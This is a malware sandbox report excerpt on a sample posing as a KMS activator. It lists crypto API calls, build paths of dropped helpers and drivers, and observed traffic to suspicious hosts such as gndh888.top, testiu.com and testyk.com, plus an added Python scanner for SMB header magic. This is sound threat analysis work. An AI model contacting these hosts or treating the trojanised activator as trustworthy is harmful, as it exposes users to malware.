Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; Code function: 3_2_00C43BC0 CryptAcquireContextA,CryptCreateHash,3_2_00C43BC0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; Code function: 3_2_00C43C50 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,@_RTC_CheckStackVars@8,3_2_00C43C50
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe; Code function: 3_2_00C43C20 CryptHashData,3_2_00C43C20
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe; Code function: 17_2_00E940D0 CryptAcquireContextA,CryptCreateHash,17_2_00E940D0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe; Code function: 17_2_00EB21C0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,17_2_00EB21C0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe; Code function: 17_2_00E94130 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,17_2_00E94130
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe; Code function: 17_2_00E94110 CryptHashData,17_2_00E94110
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe; Code function: 17_2_00EAB5E0 GetLastError,CreateFileA,GetLastError,GetFileSizeEx,GetLastError,ReadFile,_strstr,_strstr,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,GetLastError,CloseHandle,17_2_00EAB5E0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe; Code function: 17_2_00EAE520 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,17_2_00EAE520
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe; Code function: 17_2_00E90D80 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,17_2_00E90D80
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe; Code function: 17_2_00E90E50 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,17_2_00E90E50
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY----- (memstr_e252cbe5-c)
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe; Code function: mov dword ptr [ebx+04h], 424D53FFh, 17_2_00E96160
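The immediate 424D53FFh in the wrme.exe instruction above is the little-endian encoding of the SMB1 header magic 0xFF 'S' 'M' 'B', which is what the "Contains functionality to create an SMB header" signature keys on. The following added Python (not from the report, the sample or Joe Sandbox) shows that equivalence and a small scanner that tells the magic written by a `mov r/m32, imm32` apart from the same four bytes sitting in data, which is the triage question when this heuristic fires; the code/data blob it scans is constructed for the example.

```python
import struct
from typing import List, Tuple

SMB1_MAGIC = b"\xffSMB"   # 0xFF 'S' 'M' 'B': first four bytes of every SMB1 header
SMB2_MAGIC = b"\xfeSMB"   # 0xFE 'S' 'M' 'B': SMB2/SMB3 header

def magic_as_imm32(magic: bytes) -> int:
    """The 32-bit little-endian immediate that writes `magic` to memory in one mov."""
    return struct.unpack("<I", magic)[0]

def _is_mov_mem_imm32(blob: bytes, imm_off: int) -> bool:
    """True if the dword at imm_off is the operand of `mov r/m32, imm32` (opcode C7 /0)
    with a [reg], [reg+disp8] or [reg+disp32] destination. SIB forms (rm=100) and the
    mod=00/rm=101 disp32-only form are not handled; the [ebx+04h] case above does
    not need them."""
    for disp_len, mod in ((0, 0b00), (1, 0b01), (4, 0b10)):
        start = imm_off - 2 - disp_len          # opcode, ModRM, displacement, then imm32
        if start < 0:
            continue
        opcode, modrm = blob[start], blob[start + 1]
        reg, rm = (modrm >> 3) & 7, modrm & 7
        if (opcode == 0xC7 and (modrm >> 6) == mod and reg == 0
                and rm != 0b100 and not (mod == 0 and rm == 0b101)):
            return True
    return False

def find_smb_magic(blob: bytes) -> List[Tuple[int, str, str]]:
    """Every SMB1/SMB2 magic in `blob`, tagged 'mov-imm32' when it is an instruction
    immediate (header construction in code) or 'data' when it is just bytes."""
    hits = []
    for magic, proto in ((SMB1_MAGIC, "SMB1"), (SMB2_MAGIC, "SMB2")):
        off = blob.find(magic)
        while off != -1:
            kind = "mov-imm32" if _is_mov_mem_imm32(blob, off) else "data"
            hits.append((off, proto, kind))
            off = blob.find(magic, off + 1)
    return sorted(hits)

# Constructed blob (not bytes taken from the sample): the flagged instruction, an SMB2
# variant, a harmless string that contains "SMB", and a raw header fragment in data.
SAMPLE = (
    b"\x55\x8b\xec"                    # push ebp; mov ebp, esp
    b"\xc7\x43\x04\xff\x53\x4d\x42"    # mov dword ptr [ebx+04h], 424D53FFh  (as in the report)
    b"\xc7\x45\xf8\xfe\x53\x4d\x42"    # mov dword ptr [ebp-08h], 424D53FEh  (SMB2 magic)
    b"\xc3"                            # ret
    b"SMB shares unavailable\x00"      # "SMB" without the 0xFF/0xFE prefix: no hit
    b"\xffSMB\x72"                     # start of a raw SMB1 header sitting in data
)

if __name__ == "__main__":
    print(f"SMB1 magic as imm32: {magic_as_imm32(SMB1_MAGIC):#010x}")
    for off, proto, kind in find_smb_magic(SAMPLE):
        print(f"offset {off:#06x}: {proto} magic as {kind}")
```

A mov-imm32 hit means the code assembles the header itself rather than carrying a captured packet, which fits the report's other findings (a listening port, a service that is installed, a driver drop) better than a stray string would. It is still only a capability indicator: legitimate SMB clients build the same header, so the hit is a lead to the function, not a verdict.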
Source: HEU_KMS_Activator.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\_temp07242019502489\7Z.EXE; File opened: C:\Windows\_temp07242019502489\x86\msvcr100.dll
Source: unknown; HTTPS traffic detected: 103.224.212.216:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 103.224.212.211:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: Binary string: msvcr100.amd64.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, msvcr100.dll0.34.dr
Source: Binary string: F:\20201028P\KMDF_Protect\Release\KMDF_Protect_64.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wuhost.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, wuhost.exe.1.dr
Source: Binary string: W:\SECOPatcher\temp\Release\Win32\SECOPatcher\SECOPatcher.pdb source: 7Z.EXE, 00000022.00000003.1322653977.0000000000750000.00000004.00001000.00020000.00000000.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, SECOPatcher.dll.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\DvLayout.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, DvLayout.exe, 0000000B.00000000.1267571184.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe, 0000000B.00000002.1275429257.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe.1.dr
Source: Binary string: D:\Daten\Helge\Programmierung\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb@F source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe0.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\DvLayout.pdb9 source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, DvLayout.exe, 0000000B.00000000.1267571184.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe, 0000000B.00000002.1275429257.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe.1.dr
Source: Binary string: Q:\christoh\Projects\KMS-HGM\Release\KMS-Client.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, kms-client.exe.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wdlogin.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: )}D:\Office\Target\x64\ship\licensing\x-none\CleanO15SPP.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Office\Target\x86\ship\licensing\x-none\CleanO15SPP.pdb4U source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, cleanospp.exe.34.dr
Source: Binary string: msvcr100.i386.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, msvcr100.dll.34.dr
Source: Binary string: D:\Daten\Helge\Programmierung\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe0.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wrme.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.dr
Source: Binary string: D:\Daten\Helge\Programmierung\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr
Source: Binary string: \LookFile\KMDF_LOOK\Release\KMDF_LOOK_32.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: W:\SECOPatcher\temp\Release\x64\SECOPatcher\SECOPatcher.pdb source: 7Z.EXE, 00000022.00000003.1322653977.0000000000750000.00000004.00001000.00020000.00000000.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: F:\20201028P\KMDF_Protect\Release\KMDF_Protect_32.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Office\Target\x86\ship\licensing\x-none\CleanO15SPP.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, cleanospp.exe.34.dr
Source: Binary string: D:\Office\Target\x64\ship\licensing\x-none\CleanO15SPP.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, cleanospp.exe0.34.dr
Source: Binary string: E:\work\Icon_Report\Release\_service.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe, 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000000.1250640362.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, J8156NOVDEC.exe, 00000003.00000000.1258172666.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, J8156NOVDEC.exe, 00000003.00000002.2505697815.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, _J8156NOVDEC.exe.1.dr, J8156NOVDEC.exe.2.dr, nsjB6CE.tmp.1.dr
Source: Binary string: \LookFile\KMDF_LOOK\Release\KMDF_LOOK_64.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wccenter.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, wccenter.exe.1.dr
Source: Binary string: Z-D:\Work\Install_Driver\Driver_helper\Release\wrme.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.dr
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe Code function: 1_2_00405F2F FindFirstFileA,FindClose,1_2_00405F2F
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe Code function: 1_2_004064DB DeleteFileA,CloseHandle,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004064DB
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe Code function: 1_2_00402C3F FindFirstFileA,1_2_00402C3F
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: 2_2_006DFA19 FindFirstFileExW,2_2_006DFA19
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: 3_2_00C9FA19 FindFirstFileExW,3_2_00C9FA19
Source: C:\Windows\System32\drivers\DvLayout.exe Code function: 11_2_00396627 FindFirstFileExW,11_2_00396627
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe Code function: 17_2_00ED31AF FindFirstFileExW,17_2_00ED31AF
Source: C:\Windows\_temp07242019502489\7Z.EXE Code function: 34_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,34_2_0040B174
Source: C:\Windows\_temp07242019502489\7Z.EXE Code function: 34_2_0040B6E9 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,34_2_0040B6E9

Networking

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.1
Source: global traffic HTTP traffic detected: POST /api/v1/p HTTP/1.1 Host: da.testiu.com Accept: */* Content-Type:application/x-www-form-urlencoded; charset=UTF-8; image/gif; Content-Length: 0
Source: global traffic HTTP traffic detected: POST /api/v1/p HTTP/1.1 Host: db.testyk.com Accept: */* Content-Type:application/x-www-form-urlencoded; charset=UTF-8; image/gif; Content-Length: 0
Source: Joe Sandbox View IP Address: 103.224.212.211 103.224.212.211
Source: Joe Sandbox View IP Address: 72.52.179.174 72.52.179.174
Source: Joe Sandbox View IP Address: 103.235.46.96 103.235.46.96
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006622E0 recv,WSAGetLastError,2_2_006622E0
Source: global trafficHTTP traffic detected: GET /s?ie=utf-8&wd=ip HTTP/1.1User-Agent: UrlTest1Host: www.baidu.com
Source: global trafficDNS traffic detected: DNS query: www.baidu.com
Source: global trafficDNS traffic detected: DNS query: du.testjj.com
Source: global trafficDNS traffic detected: DNS query: da.testiu.com
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: global trafficDNS traffic detected: DNS query: db.testyk.com
Source: unknownHTTP traffic detected: POST /api/v1/p HTTP/1.1Host: da.testiu.comAccept: */*Content-Type:application/x-www-form-urlencoded; charset=UTF-8; image/gif;Content-Length: 0
Source: svchost.exe, 00000016.00000002.2513917571.000002C2B7400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.22.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.22.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.22.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.22.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.22.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.22.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000016.00000003.1281171307.000002C2B7190000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr, SetACL.exe0.34.drString found in binary or memory: http://helgeklein.com
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr, SetACL.exe0.34.drString found in binary or memory: http://helgeklein.com.
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr, SetACL.exe0.34.drString found in binary or memory: http://helgeklein.com/setacl/
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr, SetACL.exe0.34.drString found in binary or memory: http://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drString found in binary or memory: http://rk1.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drString found in binary or memory: http://rk2.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drString found in binary or memory: http://rk3.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rk3.gndh888.tophttp://rk4.gndh888.tophttp://rk1.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drString found in binary or memory: http://rk4.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drString found in binary or memory: http://rk5.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rk5.gndh888.tophttp://rk6.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drString found in binary or memory: http://rk6.gndh888.top
Source: KMDF_LOOK.sys.1.drString found in binary or memory: http://rk7.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rk7.gndh888.tophttp://rk2.gndh888.top-sc=
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe.1.dr, KMDF_LOOK.sys.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, DvLayout.exe.1.dr, wccenter.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drString found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe.1.dr, KMDF_LOOK.sys.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, DvLayout.exe.1.dr, wccenter.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drString found in binary or memory: http://sf.symcb.com/sf.crt0
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe.1.dr, KMDF_LOOK.sys.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, DvLayout.exe.1.dr, wccenter.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drString found in binary or memory: http://sf.symcd.com0&
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slayeroffice.com/tools/modi/v2.0/modi_help.html
Source: svchost.exe, 0000001C.00000002.2508919477.00000254A4702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2508107758.00000254A3E87000.00000004.00000020.00020000.00000000.sdmp, regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.28.drString found in binary or memory: http://standards.iso.org/iso/19770/-2/2009/schema.xsd
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://validator.w3.org/
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.da.testiu.com/api/v1/p?subid1=20240725-1019-566c-b2
Source: wrme.exe, 00000011.00000003.1323957817.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323633808.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323988394.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323514417.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1324021871.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1324021871.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323514417.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323633808.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.da.testiu.com/api/v1/p?subid1=20240725-1019-566c-b2dc-6815f4609260
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a1
Source: wrme.exe, 00000011.00000003.1337368888.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1337368888.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1338495650.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1338652221.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1338573283.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1337892131.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1337892131.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1338652221.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339840197.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a132-0ab44d06a73d
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a1Y
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/forum/
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/forum/index.php?showtopic=19368
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/images/autoit_6_240x100.jpg
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe, 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000000.1250640362.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, J8156NOVDEC.exe, 00000003.00000000.1258172666.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, J8156NOVDEC.exe, 00000003.00000002.2505697815.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, _J8156NOVDEC.exe.1.dr, J8156NOVDEC.exe.2.dr, nsjB6CE.tmp.1.drString found in binary or memory: http://www.baidu.com/s?ie=utf-8&wd=ipUrlTest1
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000130C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/s?ie=utf-8&wd=ipm
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000130C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/s?ie=utf-8&wd=ipw
Source: svchost.exe, 00000005.00000002.1374180944.00000211DEE13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
Source: HEU_KMS_Activator.exeString found in binary or memory: http://www.ccav1.com
Source: HEU_KMS_Activator.exeString found in binary or memory: http://www.ccav1.comError
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.debugbar.com/
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509398500.00000000018C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fiddlertool.com/fiddler/
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.3
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
